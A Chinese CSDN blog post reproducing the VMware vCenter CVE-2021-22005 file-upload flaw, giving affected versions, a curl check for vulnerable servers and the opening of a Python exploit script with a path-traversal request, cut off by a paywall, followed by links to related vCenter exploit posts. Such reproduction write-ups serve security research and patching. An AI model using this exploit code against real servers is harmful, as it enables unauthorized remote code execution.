VMware vCenter Server 任意文件上传漏洞复现 CVE-2021-22005

最新推荐文章于 2024-06-19 17:54:55 发布
最新推荐文章于 2024-06-19 17:54:55 发布
阅读量6.1k 收藏 7
点赞数 1
文章标签: 安全 信息安全 安全漏洞 weblogic java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/121187164
版权

文章来源|MS08067 “WEB攻防”知识星球

本文作者:Taoing(WEB高级漏洞挖掘班讲师)

追踪最新漏洞  认准Web星球

1124d67f8dc89c3338d627d803031114.png

1、漏洞描述

2、漏洞影响

3、环境搭建

4、漏洞复现

5、修复方案

漏洞描述

VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。2021年9月22日,VMware 官方发布安全公告,披露了包括 CVE-2021-22005 VMware vCenter Server 任意文件上传漏洞在内的多个中高危严重漏洞。在CVE-2021-22005中,攻击者可构造恶意请求,通过vCenter中的Analytics服务,可上传恶意文件,从而造成远程代码执行漏洞。

漏洞影响

针对 CVE-2021-22005 VMware vCenter Server 任意文件上传漏洞
VMware vCenter Server 7.0系列 < 7.0 U2c
VMware vCenter Server 6.7系列 < 6.7 U3o
VMware vCenter Server 6.5系列 不受漏洞影响
其余漏洞受影响版本可参考

https://www.vmware.com/security/advisories/VMSA-2021-0020.html
安全版本:
VMware vCenter Server 7.0 U2c
VMware vCenter Server 6.7 U3o


环境搭建

vcenter server7.0安装

https://blog.csdn.net/Rio520/article/details/115664112

VMware-VCSA-all-7.0.0-15952498.iso

https://pan.baidu.com/share/init?surl=oW3JQWIeJoYcnbbJn8PBjw

提取码:x6fa

漏洞复现

漏洞批量检测poc

我们可以针对 /analytics/telemetry/ph/api/level 端点执行更相关的 cURL 请求来识别你的服务器是否受影响。

curl -k -v "https://$VCENTER_HOST/analytics/telemetry/ph/api/level?_c=test"

•如果服务器以 200/OK 和响应正文中除“OFF”以外的任何内容(例如“FULL”)进行响应,则它很容易受到攻击。

•如果它以 200/OK 和“OFF”的正文内容响应,则它很可能不易受到攻击,并且也未修补且未应用任何变通方法。

•如果它以 400/Bad Request 响应,则对其进行修补。此检查利用以下事实:修补的实例将根据已知/接受的收集器 ID 列表检查收集器 ID (_c)。

•如果它以 404 响应,则它要么不适用,要么已应用解决方法。该解决方法会禁用受影响的 API 端点。
任何其他状态代码可能暗示不适用。

漏洞EXP:

python3 CVE-2021-22005_poc.py -t https://ip

6f9f52624003e5871ff65263d623acf0.png

import requests
import random
import string
import sys
import time
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
 return ''.join(random.choice(chars) for _ in range(size))
  
def escape(_str):
 _str = _str.replace("&", "&amp;")
 _str = _str.replace("<", "&lt;")
 _str = _str.replace(">", "&gt;")
 _str = _str.replace("\"", "&quot;")
 return _str
  
def str_to_escaped_unicode(arg_str):
 escaped_str = ''
 for s in arg_str:
   val = ord(s)
   esc_uni = "\\u{:04x}".format(val)
   escaped_str += esc_uni
 return escaped_str
 
 
def createAgent(target, agent_name, log_param):
 
  
 url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name, log_param)
 headers =
最低0.47元/天 解锁文章
Ms08067安全实验室
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VMware vCenter Server 任意文件上传漏洞CVE-2021-22005)检测
ML_Team的博客
09-26 3923
0x01 前言 很凑巧,今天刚出的VMware vCenter Server 任意文件上传漏洞通告,立马就在工作中用上了。正在内网渗透测试的我,刚发现一目标存在VMware vCenter任意文件读取漏洞,就看到阿里云应急响应中心发出的通告,随后立马去找到POC去检测,借此记录一下。 0x02 漏洞描述 VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。2021年9月22日,VMware 官方发布安全公告,披露了包括 CVE-2021-22005 VMwar
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-22005VMware vCenter GetShell(yes)
Foreverlove112的博客
10-01 1052
CVE-2021-22005VMware vCenter GetShell(yes)
VMware vCenter Server 任意文件上传漏洞CVE-2021-22005)问题
u013214212的博客
09-01 438
参考文章:https://kb.vmware.com/s/article/2107727。注释掉部分内容即可.
CMS Made Simple (CMSMS) 前台代码执行漏洞CVE-2021-26120)
最新发布
shierbai的博客
06-19 199
因此,如果CMSMS版本低于2.2.9.1,未授权的攻击者可以结合[CVE-2019-9053](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2019-9053)和CVE-2021-26120漏洞,在服务器上执行任意代码。根据页面中的安装向导来进行,其中MySQL数据库的地址是`db`,数据库名是`cmsms`,账号和密码均为`root`搭建环境访问`http://your-ip/install.php`并安装cms服务。
CVE-2021-22005VMware vCenter GetShell
m0_58596609的博客
11-29 2783
一:漏洞描述 2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。 其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005),该漏洞存在于vCenter Server的分析服务中,其CVSSv3评分为 9.8。能够网络访问vCenter Server 上的 443 端口的攻击者可以通过上传恶意文件在 vCenter Server 上远程执行代码。该漏洞无需
利用pocsuite3复现CVE-2021-22005
Jietewang的博客
10-20 3550
目录 0x01 漏洞简介 0x02 影响范围 0x03 复现过程 0x01 漏洞简介 2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。 其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005),该漏洞存在于vCenter Server的分析服务中,其CVSSv3评分为 9.8。能够网络访问vCenter Server 上的 443 端口的攻
VMware vCenter Server任意文件上传漏洞CVE-2021-22005复现
qq_42036164的博客
04-03 745
其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005),该漏洞存在于vCenter Server的分析服务中,其CVSSv3评分为 9.8。注:CVE-2021-22005会影响所有默认配置的 vCenter Server 6.7 和 7.0 部署,不会影响 vCenter Server 6.5。2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。
VMware vCenter任意文件读取漏洞
公众号shadow sock7
10-15 2276
参考: https://twitter.com/ptswarm/status/1316016337550938122 【安全风险通告】VMware vCenter任意文件读取漏洞安全风险通告 安装: https://blog.csdn.net/shida_csdn/article/details/82863169 https://www.miensi.com/352.html 安装有点麻烦,算了。 下载: https://my.vmware.com/en/web/vmware/downloads/det
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCE(CVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
【技术分享】vCenter Server CVE-2021-21985 RCE分析 .pdf
09-05
2021年,360 Noah Lab的安全研究员Ricter Z发现了针对vCenter Server的重大安全漏洞,编号为CVE-2021-21985,这是一处远程代码执行(RCE)漏洞,允许攻击者未经身份验证即可完全控制受影响的系统。 漏洞描述: 此...
CVE-2021-21972:CVE-2021-21972 VMware vCenter metasploit利用脚本中的未经授权的RCE
03-08
CVE-2021-21972 VMware vCenter metasploit利用脚本中的未经授权的RCE 准备 git clone https://github.com/TaroballzChen/CVE-2021-21972 cd CVE-2021-21972 mkdir -p ~ /.msf4/modules/exploits/multi/http cp * ~...
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POCpoc只需验证某人的路径的返回状态POC仅用于测试,未添加EXP模块POC仅用于测试,未加入exp模块
vCenter 6.5-7.0 RCE 漏洞复现(CVE-2021-21972)附POC
热门推荐
good good study
03-11 1万+
一. 漏洞介绍 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机。 2021年02月24日,某些平台监测到 Vmware官方发布了vCenter Server安全更新,修复了vSphereClient (HTML5)在vCenter Server插件vRealizeOperatio...
VMware View Planner 远程代码执行漏洞复现分析(CVE-2021-21978)
whojoe的博客
03-07 1525
VMware View Planner 远程代码执行漏洞复现分析(CVE-2021-21978)环境搭建漏洞分析漏洞复现参考文章 环境搭建 链接:https://pan.baidu.com/s/1Uw64KHr3hR553hz0a7xvrw 提取码:k3b0 双击使用vmware打开 提示输入账号密码,之后等待即可 使用刚才设置的账号密码进行登录 ifconfig|more 查看当前ip 之后使用其他管理软件链接,个人不太习惯默认的操作界面 链接之后 漏洞分析 通过查看公告发现需要上传恶意脚本文件
漏洞复现Vmware vcenter未授权任意文件RCE
Adminxe的博客
02-28 1246
0x00 Vmware vcenter信息 vSphere是VMware推出的虚拟化平台套件,包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为ESXi的控制中心,可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机,使得IT管理员能够提高控制能力,简化入场任务,并降低IT环境的管理复杂性与成本。 vSphere Client(HTML5)在vCenter Server插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向...
vmware未授权任意文件读取漏洞分析
糖小喵
02-05 1353
前言 任意文件读取漏洞是因为没有验证请求的资源文件是否合法导致的,这类漏洞java中有很大的机率出现。 VMware vCenterServer 是一个提供了可伸缩、可扩展的平台,为虚拟化管理奠定了基础。VMware vCenterServer的存在任意文件读取漏洞,暂未分配CVE。 有人在twitter 平台上,发出VMware vCenterServer任意文件读取漏洞POC,攻击者可以任意读取用户名和密码。 漏洞复现 poc: windows:ip/eam/vib?id=/Progra
推荐开源项目:CVE-2021-22005-Exp - 解析VMware vCenter Server高危漏洞
gitblog_00027的博客
06-09 279
推荐开源项目:CVE-2021-22005-Exp - 解析VMware vCenter Server高危漏洞 项目地址:https://gitcode.com/shmilylty/cve-2021-22005-exp 项目介绍 在网络安全领域,及时发现和应对漏洞是至关重要的。cve-2021-22005-exp 是一个专用于研究和测试VMware vCenter Server严重安全漏洞的开源工...
CVE-2021-21974复现
09-02
根据您提供的引用内容,CVE-2021-21974是与CVE-2021-21972相关的另一个漏洞。然而,根据提供的引用内容,我无法找到有关CVE-2021-21974复现的详细信息。建议您继续查找相关资料或参考引用中提供的链接以获取更多信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [VMware多个高危漏洞通告](https://blog.csdn.net/weixin_45728976/article/details/114022429)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [Vmware vcenter未授权任意文件上传(CVE-2021-21972)复现](https://blog.csdn.net/qq_37602797/article/details/114109428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值